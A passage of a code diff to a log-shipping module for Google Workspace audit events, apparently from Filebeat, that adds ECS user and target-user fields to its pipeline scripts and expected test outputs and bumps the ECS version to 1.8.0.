"example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_PHONE_NUMBER", @@ -1175,7 +1304,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_RECOVERY_EMAIL", @@ -1225,7 +1360,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_RECOVERY_PHONE", @@ -1275,7 +1416,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_RELATION", @@ -1327,7 +1474,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_ADDRESS", @@ -1379,7 +1532,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_EMAIL_MONITOR", @@ -1437,7 +1596,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_DATA_TRANSFER_REQUEST", @@ -1489,7 +1654,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GRANT_DELEGATED_ADMIN_PRIVILEGES", @@ -1540,7 +1711,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_ACCOUNT_INFO_DUMP", @@ -1591,7 +1768,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_EMAIL_MONITOR", @@ -1642,7 +1825,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_MAILBOX_DUMP", @@ -1693,7 +1882,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_FIRST_NAME", @@ -1745,7 +1940,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GMAIL_RESET_USER", @@ -1796,7 +1997,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_LAST_NAME", @@ -1848,7 +2055,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MAIL_ROUTING_DESTINATION_ADDED", @@ -1899,7 +2112,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MAIL_ROUTING_DESTINATION_REMOVED", @@ -1950,7 +2169,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_NICKNAME", @@ -2001,7 +2226,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REMOVE_NICKNAME", @@ -2052,7 +2283,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_PASSWORD", @@ -2102,7 +2339,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_PASSWORD_ON_NEXT_LOGIN", @@ -2154,7 +2397,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNLOAD_PENDING_INVITES_LIST", @@ -2201,7 +2450,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_RECOVERY_EMAIL", @@ -2251,7 +2503,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REMOVE_RECOVERY_PHONE", @@ -2301,7 +2559,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REQUEST_ACCOUNT_INFO", @@ -2351,7 +2615,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REQUEST_MAILBOX_DUMP", @@ -2407,7 +2677,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RESEND_USER_INVITE", @@ -2458,7 +2734,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RESET_SIGNIN_COOKIES", @@ -2508,7 +2790,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "SECURITY_KEY_REGISTERED_FOR_USER", @@ -2558,7 +2846,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_SECURITY_KEY", @@ -2608,7 +2902,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_INVITE", @@ -2659,7 +2959,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "VIEW_TEMP_PASSWORD", @@ -2710,7 +3016,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TURN_OFF_2_STEP_VERIFICATION", @@ -2760,7 +3072,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNBLOCK_USER_SESSION", @@ -2810,7 +3128,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNENROLL_USER_FROM_TITANIUM", @@ -2860,7 +3184,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ARCHIVE_USER", @@ -2910,7 +3240,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPDATE_BIRTHDATE", @@ -2961,7 +3297,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_USER", @@ -3011,7 +3353,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_USER", @@ -3061,7 +3409,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNGRADE_USER_FROM_GPLUS", @@ -3111,7 +3465,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", @@ -3161,7 +3521,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNLOAD_USERLIST_CSV", @@ -3208,7 +3574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_USER_TO_ORG_UNIT", @@ -3260,7 +3629,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD", @@ -3311,7 +3686,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RENAME_USER", @@ -3362,7 +3743,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNENROLL_USER_FROM_STRONG_AUTH", @@ -3412,7 +3799,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "SUSPEND_USER", @@ -3462,7 +3855,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNARCHIVE_USER", @@ -3512,7 +3911,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNDELETE_USER", @@ -3562,7 +3967,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNSUSPEND_USER", @@ -3612,7 +4023,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPGRADE_USER_TO_GPLUS", @@ -3662,7 +4079,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USERS_BULK_UPLOAD", @@ -3711,7 +4134,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT", @@ -3761,6 +4187,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/config/common.js b/x-pack/filebeat/module/gsuite/config/common.js index 2867ee518f80..64ce7b0620f6 100644 --- a/x-pack/filebeat/module/gsuite/config/common.js +++ b/x-pack/filebeat/module/gsuite/config/common.js @@ -50,7 +50,10 @@ var gsuite = (function () { return; } + evt.Put("user.id", evt.Get("source.user.id")); + evt.Put("user.name", data[0]); evt.Put("source.user.name", data[0]); + evt.Put("user.domain", data[1]); evt.Put("source.user.domain", data[1]); }; diff --git a/x-pack/filebeat/module/gsuite/drive/config/config.yml b/x-pack/filebeat/module/gsuite/drive/config/config.yml index 1bbe63a6574a..80583ee31b6d 100644 --- a/x-pack/filebeat/module/gsuite/drive/config/config.yml +++ b/x-pack/filebeat/module/gsuite/drive/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json index 77b16b9e929c..07868860ee6e 100644 --- a/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json @@ -58,7 +58,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_canceled", @@ -119,7 +122,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_comment_added", @@ -180,7 +186,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_requested", @@ -241,7 +250,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_reviewer_responded", @@ -302,7 +314,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "create", @@ -361,7 +376,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "delete", @@ -420,7 +438,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "download", @@ -479,7 +500,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "edit", @@ -538,7 +562,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "add_lock", @@ -597,7 +624,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "move", @@ -660,7 +690,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "preview", @@ -719,7 +752,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "print", @@ -778,7 +814,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_from_folder", @@ -839,7 +878,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "rename", @@ -900,7 +942,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "untrash", @@ -959,7 +1004,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "sheets_import_range", @@ -1018,7 +1066,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "trash", @@ -1077,7 +1128,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_lock", @@ -1136,7 +1190,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "upload", @@ -1195,7 +1252,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "view", @@ -1255,7 +1315,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_acl_editors", @@ -1320,7 +1383,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_document_access_scope", @@ -1386,7 +1452,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_document_visibility", @@ -1452,7 +1521,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "shared_drive_membership_change", @@ -1518,7 +1590,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "shared_drive_settings_change", @@ -1584,7 +1659,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "sheets_import_range_access_change", @@ -1645,7 +1723,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_user_access", @@ -1712,6 +1793,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/groups/config/config.yml b/x-pack/filebeat/module/gsuite/groups/config/config.yml index c0034e6af7a2..754825184772 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/config.yml +++ b/x-pack/filebeat/module/gsuite/groups/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/groups/config/pipeline.js b/x-pack/filebeat/module/gsuite/groups/config/pipeline.js index 21f859a13e61..a0144435049f 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/groups/config/pipeline.js @@ -129,6 +129,17 @@ var groups = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var pipeline = new processor.Chain() diff --git a/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json index b99c77b57a57..2e43310ea93f 100644 --- a/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json @@ -56,7 +56,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "accept_invitation", @@ -108,7 +111,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approve_join_request", @@ -162,7 +168,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "join", @@ -214,7 +228,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "request_to_join", @@ -266,7 +283,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_basic_setting", @@ -321,7 +341,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "create_group", @@ -372,7 +395,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "delete_group", @@ -423,7 +449,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_identity_setting", @@ -478,7 +507,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "add_info_setting", @@ -532,7 +564,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_info_setting", @@ -587,7 +622,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_info_setting", @@ -641,7 +679,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_new_members_restrictions_setting", @@ -696,7 +737,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_post_replies_setting", @@ -751,7 +795,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_spam_moderation_setting", @@ -806,7 +853,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_topic_setting", @@ -861,7 +911,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "moderate_message", @@ -916,7 +969,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "always_post_from_user", @@ -971,7 +1027,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "add_user", @@ -1026,7 +1090,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "ban_user_with_moderation", @@ -1081,7 +1153,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "revoke_invitation", @@ -1135,7 +1215,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "invite_user", @@ -1189,7 +1277,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "reject_join_request", @@ -1243,7 +1339,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "reinvite_user", @@ -1297,7 +1401,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "remove_user", @@ -1351,6 +1463,14 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/login/config/config.yml b/x-pack/filebeat/module/gsuite/login/config/config.yml index 41606ccb83c9..ab40715bd4ae 100644 --- a/x-pack/filebeat/module/gsuite/login/config/config.yml +++ b/x-pack/filebeat/module/gsuite/login/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 13c155661a0e..0fb518b351df 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -9,14 +9,17 @@ var login = (function () { evt.Put("event.category", ["authentication"]); switch (evt.Get("event.action")) { case "login_failure": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "failure"); break; case "login_success": + 